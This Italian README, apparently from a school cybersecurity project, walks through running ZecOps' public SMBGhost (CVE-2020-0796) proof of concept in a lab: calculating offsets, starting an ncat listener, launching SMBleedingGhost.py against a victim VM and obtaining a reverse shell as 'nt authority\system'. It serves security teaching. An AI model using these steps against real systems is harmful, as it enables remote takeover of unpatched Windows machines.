Exploit proof-of-concept educativo per CVE-2020-0796 (SMBGhost) che dimostra RCE pre-autenticazione su Windows SMBv3. Include configurazione di laboratorio passo-passo, calcolo dell'offset ed esecuzione di reverse shell per formazione sulla sicurezza informatica controllata.
Questo progetto dimostra un proof-of-concept (PoC) dell'exploit di CVE-2020-0796, noto anche come SMBGhost - una vulnerabilità critica di RCE pre-autenticazione che colpisce i sistemi Windows 10 e Windows Server che utilizzano SMBv3. È stato sviluppato come parte di un progetto scolastico di cybersecurity. Tutto il merito del codice dell'exploit va a ZecOps. L'ho solo utilizzato e adattato per scopi educativi per dimostrare lo sfruttamento di CVE-2020-0796 in un ambiente di laboratorio controllato.
Per replicare questa dimostrazione, è necessaria la seguente configurazione:
SMBleedingGhost.py by ZecOpscalc_target_offsets.bat by ZecOpsAvvia il Prompt dei comandi su entrambe le macchine virtuali Attaccante e Vittima.
Esegui il seguente comando su ogni macchina:
ipconfig
CVE-2020-0796-RCE-POC-master.calc_target_offsets.batCVE-2020-0796-RCE-POC-master.SMBleedingGhost.py e aprilo con Blocco note.SMBleedingGhost.py, scorri verso il basso e individua la sezione che inizia con OFFSETS = {.Apri un nuovo Prompt dei comandi ed esegui:
ncat -lvp 4321
4321 per ricevere una reverse shell dalla VM Vittima dopo uno sfruttamento riuscito.cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
python SMBleedingGhost.py <target_ip> <attacker_ip> <port>
Esempio utilizzato in questa demo:
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
192.168.18.61: IP della VM Vittima192.168.18.62: IP della VM Attaccante4321: Porta utilizzata nel listener netcatIn caso di successo, la finestra di netcat mostrerà:
Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Questo conferma che:
Puoi verificare l'accesso eseguendo:
whoami
Questo restituirà:
whoami
nt authority\system
Ciò significa che la VM Attaccante ora dispone di privilegi a livello di sistema sulla VM Vittima.
Puoi anche eseguire:
ipconfig
Per verificare che stai interagendo con la rete della VM Vittima.

Nota: La VM Vittima potrebbe bloccarsi dopo lo sfruttamento. Se accade, puoi riavviarla. La sessione dell'attaccante dovrà essere ristabilita dopo il riavvio.
Questa dimostrazione si basa sul proof-of-concept pubblicamente disponibile sviluppato da ZecOps.
Tutto il merito del codice dell'exploit va a ZecOps. L'ho solo utilizzato e adattato per scopi educativi per dimostrare lo sfruttamento di CVE-2020-0796 in un ambiente di laboratorio controllato.
Questa repository è stata creata solo per scopi educativi.
Tutti gli strumenti, gli script e le tecniche dimostrati sono pensati per aiutare a comprendere le vulnerabilità di cybersecurity in un ambiente di laboratorio controllato. Non tentare di utilizzare alcuno dei materiali forniti su sistemi o reti che non possiedi o per i quali non hai un permesso esplicito di test.
Qualsiasi uso improprio del software non sarà responsabilità dell'autore.